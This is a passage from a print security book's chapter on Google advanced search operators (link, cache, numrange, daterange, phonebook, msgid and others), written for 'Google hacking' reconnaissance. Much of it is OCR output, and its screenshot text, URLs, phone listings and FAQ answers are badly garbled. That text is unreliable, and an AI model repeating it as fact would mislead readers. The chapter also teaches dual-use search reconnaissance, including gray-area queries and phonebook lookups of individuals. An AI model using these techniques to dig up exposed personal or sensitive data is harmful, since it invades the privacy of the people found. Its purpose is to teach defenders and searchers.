\ xh), Google flakes out with only 10,700,000 results. To make matters worse, all the returned files are PDF, and none are XLS files. We've found that Boolean logic applied to this operator is usually flaky, so beware when you start tinkering. This operator can be mixed with other operators and search terms. www. syngress.com Advanced Operators • Chapter 2 59 Underground Googling Google Hacking Tip We simply can't state this enough: The real hackers play in the gray areas all the time. The filetype operator opens up another interesting play- ground for the true Google hacker. Consider the query (filetype :pdf \ file- type:xls) -inurhxis -inurhpdf, a query that should return zero results, since all PDF and XLS files have PDF or XLS in the URL, right? Wrong. At the time of this writing, this query gives over 100 results, all of them interesting, to say the least. Pay close attention to the next character %00. Link: Search for Links to a Page The link operator allows you to search for pages that link to other pages. Instead of providing a search term, the link operator requires a URL or server name as an argument. Shown in its most basic form, link is used with a server name, as shown in Figure 2.13. Figure 2.13 The Link Operator O O O Google Search: linkiwww.defcon.org - I I C I lG|http://www.gQQ9le.cQm/sear<:h?hl=en&lr=&ie=UTF-S&5afe Google Go< jgIe Web Images Groups News Froogie more » k:www.defcor .orq C~ i~A AdvanPBd Search Web Results 1 - 10 of about 1,TS0 linking to www.defcon.org. (0.20 seconds) Defcon Forurrs-Wi-Fi-proof wallpaper Defcon Fomms^ ... forum. defcon. org/showthrea:. php?action=news&catid=11 - Iflk - Cached - Similar pages Ph33r and Loathing in Las Vegas Ph33r and Loathing in Las Vegas Posted on Mon Aug 05 2002 05:19 PM I just got back from DefCon . It was really fun. There were a lot of punks there this year. ... www. peerfear. org' rs s/ perm al ink.' 10296931 76. s htm I -26k - Sep S, 2004 - Cached - Similar pages Dfsplaya menu www.syngress.com 60 Chapter 2 • Advanced Operators Each of the search results shown in Figure 2.10 contains HTML links to the www.defcon.org Web site. The link operator can be extended to include not only basic URLs but complete URLs that include directory names, filenames, param- eters, and the like. Keep in mind that long URLs are much more specific and could return fewer results. The only place the URL of a link is visible is in the browser's status bar or in the source of the page. For that reason, unlike other cached pages, the cached page for a link operator's search result does not highlight the search term, since the search term (the linked Web site) is never really shown in the page. In fact, the cached banner does not make any reference to your search query, as shown in Figure 2.14. Figure 2.14 A Generic Cache Banner Displayed for a Link Search ^3 O O Ph33r and Loathing in l^s Vegas 3 fc] |G|lnltp://64.233.161.104/sear<:h'q=cache:OzQ6sTJtNEQJ:w ' O," Google 0 This is G 0 g I e's cache of httDi/www. peerfear. oroi'^ rs s/penn ai i n k/ 1 026593 1 76. s htm I as retrieved on Sep 5, 2004 10:24:0B GMT. Go g I e's cache is the snapshot that we tool"; of the page as we crawled the web. The page may have changed since that time. Clicit here for the current page without highiighting. This cached page may reference images which are no iongeravaiiabie. CWdn. here for the cached text oniy. To llnl< to or booli'tp7/64.233.161.104/search?q=cache:crxBjCHMzQ|;www.lterneltraffic.or - O.- linlc:linu!( © [T L. A T This is G 0 q 1 e's cache of httD://wi(iw.kerneitraffic.orai'l current page The inanchor operator helps search the anchor, or the displayed text on the Unk, the words "current page." Inanchor accepts a word or phrase as an argument, such as inanchor xUck or inanchor James.Foster.This search will be handy later, especially when we begin to explore ways of searching for relationships between sites. The inanchor operator can be used with other operators and search terms. Cache: Show the Cached Version of a Page As we've already discussed, Google keeps snapshots of pages it has crawled that we can access via the cached link on the search results page. If you would like to jump right to the cached version of a page without first performing a Google query to www. syngress.com Advanced Operators • Chapter 2 63 get to the cached link on the results page, you can simply use the cache advanced operator in a Google query such as cacheMackhat.org or cache :http :/ /www.netsec.net. If you don't supply a complete URL or hostname, Google could return unpre- dictable results. Just as with the Unk operator, passing an invalid hostname or URL as a parameter to cache wiU subnTit the query as a phrase search. A search for cache :Unux returns exactly as many results as "cache Unux", indicating that Google did indeed treat the cache search as a standard phrase search. The cache operator does not always work as expected, and in many cases, you're better off getting to a cached page from a Google results page. The cache operator cannot be used with other operators or search terms. Numrange: Search for a Number The numrange operator requires two parameters, a low number and a high number, separated by a dash. This operator is powerful but dangerous when used by malicious Google hackers. As the name suggests, numrange can be used to find numbers within a range. For example, to locate the number 12345, a query such as numrange:123 44-123 46 will work just fine. When searching for numbers, Google ignores symbols such as currency markers and commas, making it much easier to search for numbers on a page. Two shortened versions of this operator exist as well. Instead of supplying the numrange operator, you can simply provide two numbers in a query, separated by two periods. The shortened version of the query just mentioned would be 12344.. 12346. Notice that the numrange oper- ator was left out of the query entirely. In addition, the ext operator can be used as in ext:12344-12346. Each of these shorthand versions return the same results as the matching numrange search. This operator can be used with other operators and search terms. Underground Googling Bad Google Hacker! If Gandalf the Grey were to author this sidebar, he wouldn't be able to resist saying something like "There are fouler things than characters lurking in the dark places of Google's cache." The most grave examples of Google's power lies in the use of the numrange operator. It would be extremely irresponsible of us to share these powerful queries with you. Continued WWW. syngress.com 64 Chapter 2 • Advanced Operators Fortunately, the abuse of this operator has been curbed due to the dili- gence of the hard-working members of the Search Engine Hacking forums at http://Johnny.ihackstuff.com. The members of that community have taken the high road time and time again to get the word out about the dangers of Google hackers without spilling the beans and creating even Daterange: Search for Pages Published Within a Certain Date Range The daterange operator can tend to be a bit clumsy, but it is certainly helpful and worth the effort to understand. You can use this operator to locate pages indexed by Google within a certain date range. Every time Google crawls a page, this date changes. If Google locates some very obscure Web page, it might only crawl it once, never returning to index it again. If you find that your searches are clogged with these types of obscure Web pages, you can remove them fix)m your search (and subsequently get fresher results) through effective use of the daterange operator. The parameters to this operator must always be expressed as a range, two dates separated by a dash. If you only want to locate pages that were indexed on one specific date, you must provide the same date twice, separated by a dash. If this sounds too easy to be true, you're right. It is too easy to be true. Both dates passed to this operator must be in the form of two Julian dates. The JuHan date is the number of days that have passed since January 1, 4713 B.C. For example, the date September 11, 2001, is represented in Julian terms as 2452164. So, to search for pages that were indexed by Google on September 11, 2001, and contained the word "osama bin laden," the query would be daterange:2452164-2452164 "osama bin laden". Google does not officially support the daterange operator. The Google folks prefer you use the date limit on the advanced search form found at http://www.google.com/advanced_search.As we discussed in the last chapter, this form creates fields in the URL string to perform specific functions. Google designed the as_qdr field to help you locate pages that have been updated within a certain time frame. For example, to find pages that have been updated within the past three months and that contain the word Google, use the query http : / / www.google. com/ search ?q =google&as_qdr=m3 . This might be a better alternative date restrictor than the clumsy daterange operator. Just understand that these are very different functions. Daterange is not the advanced-operator equivalent for as_qdr, and unfortunately, there is no oper- www. syngress.com Advanced Operators • Chapter 2 65 ator equivalent. If you want to find pages that have been updated within the past year or less, you must either use Google advanced search interface or stick &as_qdr=3m (or equivalent) on the end of your URL. The daterange operator must be used with other search terms or advanced operators. It will not return any results when used by itself. In addition, daterange only works with Web searches. Info: Show Google's Summary Information The info operator shows the summary information for a site and provides links to other Google searches that might pertain to that site, as shown in Figure 2. 18. The parameter to this operator must be a valid URL or site name. You can achieve this same functionality by supplying a site name or URL as a search query. Figure 2.18 A Google Info Query's Output o o o Google Search; infoiwww.csc.com - I I a I 0http://www.goo9le.com/seirch7hl = en&lr=&ie=UTF-S&q=ir - | Web Images Groups IMevffi Frooole more I {search j info: www.csc.com A-dvanoBd Bearsh Web Showing web page information forwww.csc.com Tip: Try GoQoie Answers for heip from expert researchers CSC: Consulting. Systems Inteqratian and Outsourcinfl More News. ... Google can show you the following infomnation forthis URL • Show Google's cache ofwww.csc.com • Show stock quotes for CSC (Computer Sciences Corporation) • Find web pages that are similarto www.csc.com • Find web pages that link to www.csc.com • Find web pages that contain the term "www.csc.oom" If you don't supply a complete URL or hostname, Google could return unpredictable results. Just as with the link and cache operators, passing an invalid hostname or URL as a parameter to info will submit the query as a phrase search. A search for infodinux returns exactly as many results as "info linux", indicating that Google did indeed treat the info search as a standard phrase search. The info operator cannot be used with other operators or search terms. www. syngress.com 66 Chapter 2 • Advanced Operators Related: Show Related Sites The related operator displays sites that Google has determined are related to a site, as shown in Figure 2. 19. The parameter to this operator is a valid site name or URL. You can achieve this same functionality by clicking the Similar Pages link from any search results page or by using the "Find pages similar to the page" (shown in Figure 2.19) portion of the advanced search form. Figure 2.19 Odd Relatives: Sensepost and Disney? ^ (3 Google Search: relaled:www.sensepost.com ^1 I C I |G|http://www.google,[Qm/sea.rth7hl=er&lr=&ie=UTF-S&q=rt " Q' Google Images Groups News Fnoogle more » related, www.sen&epost. com Web Results 1 -IDof about 31 similar to www.sensepost.cDm. (0.52 seconds) reroule mvw.sensepost.com/ - 2k - Cached - Similar pages Disney Channel - Kim Possible Kim Possible Games! Anything you send to us or do here could end up on TV - on Disney Channel! psc.disney.go.com/dlsneychannel/kim&osslbley - 5k - Cachesd - Similar pages InvaderZim Official Nickelodeon site with character profiles, desktop downloads, sound clips, and pictures. [Require... www.nlck.com/all nick/tv supersltes/zim/ - 1Sk - Cached - Similar pacies CarBuvinQTiD5.com new car buying guide. avoidinQ dealer scairs. new ... new cars, new car buying guide, car buying tips, new car purchase, buying a car, buy a car. carbuylngtlps.com Car dealers hate us... You'll Love us! ... www.carbuylngtlps.ccm/ - 72k - Cached - Similar pages Svs-Securitv.conn - Because Securitv is not Trivial Welcome to Sys-Secuhty.com, Home. Sys-Security.com Is a web site dedicated to computer security research. It is the home of the "ICMP ... www.sys-BeGurity.Gom/ - 2[)k - Cached - Similar pages Welcome lo DEF CON, the Largest Underground Hacking Convention in ... Defcon. We lcome to the largest underground hacking event in the world. Comm unity. fcfiispky a menu If you don't supply a complete URL or hostname, Google could return unpredictable results. Passing an invalid hostname or URL as a parameter to related will submit the query as a phrase search. A search for relateddinux returns exactly as many results as "related linux", indicating that Google did indeed treat the cache search as a standard phrase search. The related operator cannot be used with other operators or search terms. Author. Search Groups for an Author of a Newsgroup Post The author operator will allow you to search for the author of a newsgroup post. The parameter to this option consists of a name or an e-mail address. This oper- www. syngress.com Advanced Operators • Chapter 2 ator can only be used in conjunction with a Google Groups search. Attempting to use this operator outside a Groups search will result in an error. When you're searching for a simple name , such as author Johnny, the search results wiU include posts written by anyone with the first, middle, or last name of Johnny, as shown in Figure 2.20. Figure 2.20 A Search ior AuthorJohnny ooo Google Search: authorjohnny i|http: //groups. google. com ^'groups?lil=en.a!lr=Siie=UTF-S&q=auth< ' Re: Rami d'albero e voliere: dove posarsi.. II /09 set 2004/, * ( The Scyther )* ha scritto: In quoto! - La postazione internet di gobbacci? http:^/snipurl.com/B6o7 It.sport.calclQ.rQnia - Sep 9, 2004 by Johnny Lurker - View Thread (S articiss) comiciStcentraggio pacchetto immagini: come? Ho unito in un /Pacchetto immagini/ 4 diverse fotografie seguendo le istmzioni della guida in linea di Photoshop Elements 2.0 (prima che mi rispondiate RTFM ;-) Non sono pero riuscito a comprendere se sia possibile: 1) incomiciare ogni singola ... it.comp.grafica. Photoshop - Sep 9, 2004 by Johnny Walker - View Thread (1 article) iUA: SOC@Everqreen ('?iSMSK4"&), iUm: NCUOCSA X-Hi ncu-bbs club ncuQcsa - Sep 9, 2004 by Johnny - View Thread 12 articles^ ReiErCyrilqiefkold" "Ejvind Kmse" skrev i en meddelelse news:2qaiqsFsfqphU1@uni-berlin.de.. si4et ordet "p^Ljse" op ? Han har nol^ il^l^e spurgt Cyril om iov til, at gere det endnu.... /Johnny dl^.snal<.mudd6ri2 by FRFMOUSE - View Thread (4 articles^ (na subject) Salve a Lutti. Vorrei pon"e un quesito al newsgfrcup. A nessuno di voi si manifestano problemi con windows media player nella leturadi file dai cd-rom? Ho provato a riinstaiiarlo due volte ma niente da fare. ... it. comp. PS. win .software - Jan 29, 2001 by vin - View Thread t1 articled Monitoraggio file transfer Ciao a tutti!!! 10) Volevo chiedere se qualcuno conosce un programma che mi dia un eierco dei flies trasferiti in una connessione via modem ad un seni'er FTP... Gra2ie Ik! :o) Ciao :o) Wario o ... it. comp. software. shareware - Aug 9, 2000 by 49B1 9iSB"Mario Zandalasini" - ViewTliread (1 article) In our experience, the group operator does not mix very well with other operators. If you get odd results when throwing ^roMj? into the mix, try using other operators such as intitle to compensate. Insubject Search Google Groups Subject Lines The insubject operator is effectively the same as the intitle search and returns the same results. Searches for intitle: dragon and insubject: dragon return exactly the same number of results. This is most likely because the subject of a group post is also 70 Chapter 2 • Advanced Operators the title of the post. Subject is (and was, in DejaNews) the more precise term for a message title, and this operator most likely exists to help ease the mental shift from "deja searching" to Google searching. Just like the intitle operator, insubject can be used with other operators and search terms. Msg id: Locate a Group Post by Message ID The msgid operator, available only for Groups searching, takes only one operator, a group message identifier. A message identifier (or message ID) is a unique string that identifies a newsgroup post. The format is something like xxx@YYY.com. To view message IDs, you must view the original group post format. When viewing a post (see Figure 2.24), simply click the original format link. You wUl be taken to a text-only page that lists the entire content of the group post, as shown in Figure 2.25. Figure 2.24 A Typical Group Message Google Search: google hacking C [G]http://groups. google. com/groijps?q=google+hac Goosle Groupsw Groups Web imaoes Groups News Froogle more » ~ r> Advanced Groups Saa l google hacking Top-Rated Anti Hacking ' Free Sea n , awa rded 5 pywa re a nd Troja n ib mova I - Down tiad tow! ■ WiVW.pctools.com Aladdin eToken ■ Secum Two-Factor Authentcation In a USB Davica the Siza of a Key ■ W(AW. eAladdin.com Certified Ethical Hacker ■ Cartifcaton Training Courea AII-inclusrM« 5-day boot camp ■ WWWJt- centers.com From: Lensman (p re si d e nt@ w h ite h o u se gov ) Subject; Re: google primer Newsgroups: allhacking Date: 2004-05-14 03:55:03 PST Search result 9 For google hacking Search Result 9 View: Complete Thread (12 articles) Original Format On Fri, 14 May 2004 08:05:14 GMT, grey wrote: f ■•'■<-^ WWW. syngress.com Advanced Operators • Chapter 2 71 Figure 2.25 The Message ID of a Post Is Visible Only in the Post's Original Format El http://groups. google. conn/group5?selm...slir7eebo6b?^04 ax. corn&output=gplaii C I |C]littp://groups. google. <:om/groijps7selm=9[89a " Or Google From: Lensman -Jpresident Swhitehouse . gov> ewsgroups : alt . hacking Sub j ect : Re : google primer Date! Fri, 14 May 2004 l0!54!0l +0000 |UTC} Organization '. BT Openworld Lines ! 4^ Hessage-ID ■ <9t89a0d61aaS5Sn jol2&t&&3lir7eebo6b@4ax . coni> References! -JqsefiaOto j oObtvOevi66p Ikf nr Iaijhij34v8 4ax . coiii> ■<:40a32£9d. 0^1 news 1 .mweb .co.2a> <6691a.0'hi2 12mknkck2 n9immj 2 ijgk3qab78 g 4 ax . coni> Heply-To : president gwhitehouse . gov HNTP-Posting-Bost ■ host2 17-45-254-49. in-addr . b t openworld . com Mime- Version s 1.0 Content-Type s text /plain ; charset=us-asGii Content-Transfer-Encoding ■ 7bit X-Trace! herciiles.btinternet.com 10845:12041 11181 217.45.254.49 {lH May 2004 10!54!01 GMT) X-Complaints-To ! news-complaints^ lists . btinternet . com HMTP-Posting-Date ! Fri, 14 May 2004 10; 54; 01 +0000 (UTC) X-Hewsreader ■ Forte Free Agent 2.0/32.652 3 To retrieve the message shown in Figure 2.25, use the query msgid: 9t89a0d6laa555njol29t99sUr7eeho6h@4ax.com. The msgid operator does not mix with other operators or search terms. Stocks: Search for Stock Information The stocks operator allows you to search for stock market information about a particular company. The parameter to this operator must be a valid stock abbrevi- ation. If you provide an invalid stock ticker symbol, you wiU be taken to a screen that allows further searching for a correct ticker symbol, as shown in Figure 2.26. Figure 2.26 Searching for a Valid Stock Symbol O O Google Finarcial Infarmation: "computer" [ ^ ir- I I C ] |G|lnltp://www.google.com/se " Or stocks. "computer" Google' Financial information for "computer" on I FooLcom MSN MoneyCentral Cl&arStatl&n I $7 Trade Get hree Streaner 2b ^ree Iraces Unllnltec Sh Invalid Ticker Symbol computer'" is not a valid ticker symbol. Look Jpthe Ticker Symbol: Name: Type; r^arket; ■computef" [ ] Stocks ijj ' US fi, Canada f Look Up ^ Suggestions: ■Check supported financial markelsand exchanges . •Run a more general finance search w d www.syngress.com 72 Chapter 2 • Advanced Operators The stocks operator cannot be used with other operators or search terms. Define: Show the Definition of a term The define operator returns definitions for a search term. Fairly simple, and very straightforward, arguments to this operator may be a word or phrase. Links to the source of the definition are provided, as shown in Figure 2.27. Figure 2.27 Results of a Define Search O O O Google Search: defineiironic l ^-^ ^' ] [ ^ ] |C|http://www.gQQgle.cQm/search?hl=en&i " Google Web Images Groups News Fropgle more w ~~~7. I '. ■ AT Advanced Sfiarch ■^^fine^i™"^ I C Search; p^femneBs Web Tip: Try Gooole Answers for help from expert researchers Definitions of ironic on the Web: humorously sarcastic or mocking; "dry humor"; "an ironic remari< often conveys an intended meaning obiiquely", "an ironic novel"; "an ironical smile", "with awry Scottish wit" www, c OPS c I ■ on n c eton . ed uy c oi-bl ny webwn The define operator cannot be used with other operators or search terms. Phonebook: Search Phone Listings The phonebook operator searches for business and residential phone listings. Three operators can be used for the phonebook search: rphonebook, bphonebook and phonebook, which will search residential listings, business listings, or both, respec- tively. The parameters to these operators are all the same and usually consist of a series of words describing the listing and location. In many ways, this operator functions like an alUntitle search, since every word listed after the operator is included in the operator search. A query such as phonebook:john darUng ny would list both business and residential listings for John Darling in New York. As shown in Figure 2.28, links are provided for popular mapping sites that allow you to view maps of an address or location. www. syngress.com Advanced Operators • Chapter 2 73 Figure 2.28 The Output of a Phonebook Query : O ^ Google Search; John darling ny - I I C I |C|liltp7;www.goo9le.com/search?hl=en&lr^&ie^UTF-SS! - Q.- Gouale PhoneBook*— ' Web Imaoes Groups News Frooole more » John darling ny ^ ^Search PhofieSook} (^Search the Web ^ Pmferenoas Business Phonebook Results 1 - 2 of 2 for John darling ny. (D.25 seconds) Darling John E Atty - (519) 271-6555 - 297 River St. Tnov. NY 12190 - Yahoo! Maos - MacCtuest Darling John E Atty - (518) 279-3331 - . Crocsevville. NY 12052- Yahoo! Mans - MacQuest Residential Plioneboolt Results 1 - S of 16 for John darling ny. (D.2S seconds) If you were only interested in a residential or business listing, you would use the rphonebook and bphonebook operators, respectively. There are other ways to get to this information without the phonebook operator. If you supply what looks like an address (including a state) or a name and a state as a query, Google wiU return a link allowing you to map the location in the case of an address (see Figure 2.29) or a phone listing in the case of a name and street match. Figure 2.29 Google Understands Addresses Google Search: 123 stone dr ny ]http://www.google.com/sear<:h?hl=i " Or Google Google Web Images Groups News Frooole more )> 123 stone dr ny ^ Scare I Web Results 1 - 1 0 of about 52,&EI'D for 123 sione dr ny. (0.81 seconds) Map of 123 Stone DrNyNY Yahoo! Map s - MapQuest Sponsored Links US Physician Directory I All states. Address, Phone, Fax www. syngress.com 74 Chapter 2 • Advanced Operators Underground Googling Hey, Get Me Outta Here! If you're concerned about your address information being in Google's databases for the world to see, have no fear. Google makes it possible for you to delete your information so others can't access it via Google. Simply fill out the form at www.google.com/help/pbremoval.html and your information will be removed, usually within 48 hours. This doesn't remove you from the Internet (let us know if you find a link to do that), but the page gives you a decent list of places that list similar information. Oh, and Google is trusting you not to delete other people's information with this form. The phonebook operators do not provide very informative error messages, and it can be fairly difficult to figure out whether or not you have bad syntax. Consider a query for phonebook:john smith. This query does not return any results, and the results page looks a lot like a standard "no results" page, as shown in Figure 2.30. Figure 2.30 Phonebook Error Messages Are Very Misleading o o o Google Search: John smith [ C ] |G]http://www.goo9le.com/sear<:h?hl=enfi " Or Google GouQle PhoneBookf Web Imaoes Groups News Frooole mors » john smith "J f Search PhoneSook") Residential Phoneboolt Your search - John smith - did not match any documents. Suggestions: - Make sure all words are spelled conrectly, - Try different keywords. - Try more general keywords. - Try fewer keywords. Also, you can try Google Answers for expert help with your search, e ^ ~ ^'Display a men Li www. syngress.com Advanced Operators • Chapter 2 75 To make matters worse, the suggestions for fixing this query are all wrong. In this case, you need to provide more information in your query to get hits, not fewer keywords, as Google suggests. Consider phonebook:john smith ny, which returns approximately 600 results. Colliding Operators and Bad Search-Fu As you start using advanced operators, you'U realize that some combinations work better than others for finding what you're looking for. Just as quickly, you'U begin to realize that some operators just don't mix weU at aU. Table 2.3 shows which operators can be mixed with others. Operators listed as "No" should not be used in the same query as other operators. Furthermore, these operators will sometimes give funky results if you get too fancy with their syntax, so don't be surprised when it happens. This table also lists operators that can only be used within specific Google search areas and operators that cannot be used alone. The values in this table bear some explanation. A box marked "Yes" indicates that the operator works as expected in that context. A box marked "No" indicates that the operator does not work in that context, and Google indicates this with a warning message. Any box marked with "Not reaUy" indicates that Google attempts to translate your query when used in that context. True Google hackers love exploring gray areas like the ones found in the "Not reaUy" boxes. www. syngress.com Table 2.3 Mixing Operators Mixes with Operator Other Operators? Can Be useo Alone; vveD ! Images? Groups? News? intitle Yes Yes Yes Yes Yes Yes allintitle No Yes Yes Yes Yes Yes inurl Yes Yes Yes Yes Not really Like intitle allinurl No Yes Yes Yes Yes Like intitle filetype Yes No Yes Yes No Not really allintext Not really Yes Yes Yes Yes Yes site Yes Yes Yes Yes No Not really link No Yes Yes No No Not really inanchor Yes Yes Yes Yes Not really Yes numrange Yes Yes Yes No No Not really daterange Yes No Yes Not really Not really Not really cache No Yes Yes No Not really Not really info No Yes Yes Not really Not really Not really related No Yes Yes No No Not really phonebook, No Yes Yes No No Not really rphonebook. bphonebook author Yes Yes No No Yes Not really group Not really Yes No No Yes Not really insubject Yes Yes Like intitle Like intitle Yes Like intitle msgid No Yes Not really Not really Yes Not really stocks No Yes No No No Like intitle define No Yes Yes Not really Not really Not really Advanced Operators • Chapter 2 77 Allintext gives all sorts of crazy results when it is mixed with other operators. For example, a search for allmtext:moo goo gai filetype :pdf works weU for finding Chinese food menus, whereas allintext: Sum Dum Goy intitle: Dragon gives you that empty feeling inside — like a year without the 1985 classic The Last Dragon (see Figure 2.31). Figure 2.31 Allintext Is Bad Enough to Make You Want to Cry 3 ^ ^ 0 Google Search: allintextiSum Dum Coy intitleiDragon -~] [ C I |G|http://www.goo9le.com/searth?q= " Or ailliintext:Sum Dum Goy intitleiDragon GotJgle Web Images Groups News Froogle more » 77- - Z '. T ;7\ A-dvani^Bd Search allifitexrSum DNtn Coy intitleiDragon Search ) p^f^^sn^s Google Home - Advertising Programs - Business Solutions - About Google ©2004 Google Despite the fact that some operators do combine with others, it's stiU possible to get less than optimal results by running your operators head-on into each other. This section focuses on pointing out a few of the potential bad collisions that could cause you headaches. We 'U start with some of the more obvious ones. First, consider a query like something -something. This query returns nothing, and Google teUs you as much. This is an obvious example, but consider intitle: something -intitle:something.This query, just like the first, returns nothing, since we've negated our first search with a duplicate NOT search. Literally, we're saying "find something in the title and hide aU the results with something in the title." Both of these examples clearly illustrate the point that you can't query for something and negate that query, because your results wiU be zero. It gets a bit tricky when the advanced operators start overlapping. Consider site and inurl.The URL includes the name of the site. So, extending the "don't contradict yourself" rule, don't include a term with site and exclude that term with inurl and vice versa and expect sane results. A query like site:microsoft.com - inurl -.micro soft. com doesn't make much sense at aU, and the results are somewhat trippy as shown in Figure 2.32. www. syngress.com 78 Chapter 2 • Advanced Operators Figure 2.32 No One Said Hackers Obeyed Reality o o o Google Search: site:micro5ofr.com -inurhmicrosoft.cori j|http://www.google.com/search7hl=enfilr=Siie: Google Web Imapes Groups News Froogle more » i site :m icrosoft.com, -inurl:microsoft.com r~ 7~\ Advai Web Results 1 -3of Sfnam microsofl.com for -inurhmicrosofl.com. (D. 34 seconds) Tip: Try Gooale Answers for help from expert researchers www.m5-net5cape-qooqle.coiTi%01%0Q@suppciift.micro5oft.conn/?id-833786 Similar pages www.chinfl0.conn%Q1%00@www. microsoft. com/ Slmiiar pages WWW. netscape. com%Q1 %00fSiwww.micro5oft.com/ Simiiar pages These search results, considered junk by most Web searchers, are just the kind of things that Google hackers pride themselves in finding and working with. However, when you're really trying to home in on a topic, keep the "rules" in mind and you'll accelerate toward your target at a much faster pace. Save the rule breaking for your required Google hacking Ucense test! Here's a quick breakdown of some broken searches and why they're broken: site:com site:edu A hit can't be both an edu and a com at the same time. What you're more likely to search for is (sitexdu \ sitexom), which searches for either domain. inanchor: click —click This is contradictory. Remember, unless you use an advanced operator, your search term can appear anywhere on the page, including title, URL, text, and even anchors. allinurhpdf allintitle:pdf Operators starting with all are notoriously bad at combining. Get out of the habit of combining them before you get into the habit of using them! Replace allinurl with inurl, allintitle with intitle, and just don't use allintext. It's evil. site:syngress.com allinanchor:syngress publishing This query returns zero results, which seems natural considering the last example and the fact that most all* searches are nasty to use. However, this query suffers from an ordering problem, a fairly common problem that can www. syngress.com Advanced Operators • Chapter 2 79 really throw oil" some narrow searches. By changing the query to alU- nanchor:syngress publishing site:syngress.com, which moves the aUinanchor to the beginning of the query, we can get many more results. This does not at all seem natural, since the allintitle operator considers all the following terms to be parameters to the operator, but that's just the way it is. link:www.microsoft.com linux This is a nasty search for a beginner because it appears to work, finding sites that link to Microsoft and men- tion the word linux on the page. Unfortunately, link doesn't mix with other operators, but instead of sending you an error message, Google "fixes" the query for you and provides the exact results as "link. unvw. microsoft, com " linux. www. syngress.com Chapter 2 • Advanced Operators Summary Google offers plenty of options when it conies to performing advanced searches. URL modification, discussed in the previous chapter, can provide you with lots of options for modifying a previously submitted search, but advanced operators are better used within a query. Easier to remember than the URL modifiers, advance operators are the truest tools of any Google hacker's arsenal. As such, they should be the tools used by the good guys when considering the protection of Web-based information. Most of the operators can be used in combination, the most notable excep- tions being the allintitle, allinurl, allinanchor, and allintext operators. Advanced Google searchers tend to steer away from these operators, opting to use the intitle, inurl, and link operators to find strings within the title, URL, or links to pages, respectively. Allintext, used to locate all the supplied search terms within the text of a document, is one of the least used and most redundant of the advanced operators. Filetype and site are very powerful operators that search spe- cific sites or specific file types. The datemnge operator allows you to search for files that were indexed within a certain time frame. When crawling Web pages, Google generates specific information such as a cached copy of a page, an infor- mation snippet about the page, and a Hst of sites that seem related. This informa- tion can be retrieved with the cache, info, and related operators, respectively. To search for the author of a Google Groups document, use the author operator. The phonebook series of operators return business or residential phone listings as well as maps to specific addresses. The stocks operator returns stock information about a specific ticker symbol, whereas the define operator returns the definition of a word or simple phrase. Solutions Fast Track Intitle 0 Finds strings in the title of a page 0 Mixes well with other operators 0 Best used with Web, Group, Images, and News searches www. syngress.com Advanced Operators • Chapter 2 AlUntitle 0 Finds all terms in the title of a page 0 Does not mix well with other operators or search terms 0 Best used with Web, Group, Images, and News searches Inurl 0 Finds strings in the URL of a page 0 Mixes well with other operators 0 Best used with Web and Image searches Allinurl 0 Finds all terms in the URL of a page 0 Does not mix well with other operators or search terms 0 Best used with Web, Group, and Image searches Filetype 0 Finds specific types of files based on file extension 0 Synonymous with ext 0 Requires an additional search term 0 Mixes well with other operators 0 Best used with Web and Group searches Allintext 0 Finds all provided terms in the text of a page 0 Pure evil — don't use it 0 Forget you ever heard about allintext 82 Chapter 2 • Advanced Operators Site 0 Restricts a search to a particular site or domain 0 Mixes well with other operators 0 Can be used alone 0 Best used with Web, Groups and Image searches Link 0 Searches for Hnks to a site or URL 0 Does not mix with other operators or search terms 0 Best used with Web searches Inanchor 0 Finds text in the descriptive text of links 0 Mixes well with other operators and search terms 0 Best used for Web, Image, and News searches Daterange 0 Locates pages indexed within a specific date range 0 Requires a search term 0 Mixes well with other operators and search terms 0 Best used with Web searches Numrange 0 Finds a number in a particular range 0 Mixes well with other operators and search terms 0 Best used with Web searches www.syngress.com Advanced Operators • Chapter 2 Cache 0 Displays Google's cached copy of a page 0 Does not mix with other operators or search terms 0 Best used with Web searches 0 Displays summary information about a page 0 Does not mix with other operators or search terms 0 Best used with Web searches Related 0 Shows sites that are related to provided site or URL 0 Does not mix with other operators or search terms 0 Best used with Web searches 0 Shows residential or business phone listings 0 Does not mix with other operators or search terms 0 Best used as a Web query 0 Searches for the author of a Group post 0 Mixes well with other operators and search terms 0 Best used as a Group search Info Bphonebook Author www. syngress.com 84 Chapter 2 • Advanced Operators Group 0 Searches Group names, selects individual Groups 0 Mixes well with other operators 0 Best used as a Group search Insubject 0 Locates a string in the subject of a Group post 0 Mixes well with other operators and search terms 0 Best used as a Group search 'J Msgid 0 Locates a Group message by message ID 0 Does not mix with other operators or search terms 0 Best used as a Group search Stocks 0 Shows the Yahoo Finance stock listing for a ticker symbol 0 Does not mix with other operators or search terms 0 Best provided as a Web query Define 0 Shows various definitions of a provided word or phrase 0 Does not mix with other operators or search terms 0 Best provided as a Web query www. syngress.com i Advanced Operators • Chapter 2 Links to Sites 0 The Google filetypes FAQ, www.google.com/help/ faq_filetypes.html 0 The resource for file extension information, www.filext.com This site can help you figure out what program a particular extension is associated with. 0 http:/ / searchenginewatch.com/ searchday/ article.php/2160061 This article discusses some of the issues associated with Google's date restrict search options. 0 Very nice online Julian date converters, www.24hourtransla- tions.co.uk/dates.htm and www.tesre.bo.cnr.it/~mauro/JD/ Frequently Asked Questions The following Frequently Asked Questions, answered by the authors of this book, are designed to both measure your understanding of the concepts presented in this chapter and to assist you with real-life implementation of these concepts. To have your questions about this chapter answered by the author, browse to www.syngress.com/solutions and click on the "Ask the Author" form. You will also gain access to thousands of other FAQs at ITFAQnet.com. Q: Do other search engines provide some form of advanced operator? How do their advanced operators compare to Google's? Al Yes, most other searchensines offer similar operators. Yahoo is the most sim- ilar to Google, in ouHopinicln. This might have to do with the fact that Yahoo once relied solely on Google as its search provider. The operators available with Yahoo include site (domain search), hostname (fuU server name), link, ml (show onl y ^e docunopnt^mMf/, and mftY/e. The Yahoo advanced search page offers other optioiJp^iifcjRL mojJjfi^js^You can dissect the HTML form at http://searc^rahocMpm/s|^h/opcwis to get to the inter- esting options here. Be prcjjiLd for^^barM page thaMooks a lot like Google's advanced search page. M m AltaVista offers domain, host, link, title, andHW''!^erators. The AltaVista advanced search page can be found at www.altavista.com/web/adv. Of par- ticular interest is the timeframe search, which allows more granularity than www. syngress.com Chapter 2 • Advanced Operators Google's as_qdr URL modifier, allowing you to search either ranges or spe- cific time frames such as the past week, two weeks, or longer. Q: Where can I get a quick rundown of all the advanced operators? A: Check out www.google.com/help/operators.html.This page describes var- ious operators and is a good summary of this chapter. It is assumed that new operators are listed on this page when they are released, but keep in mind that some operators enter a beta stage before they are released to the public. Sometimes these operators are discovered by unsuspecting Google users throwing around the colon separator too much. Who knows, maybe you'll be the next person to discover the newest hidden operator! 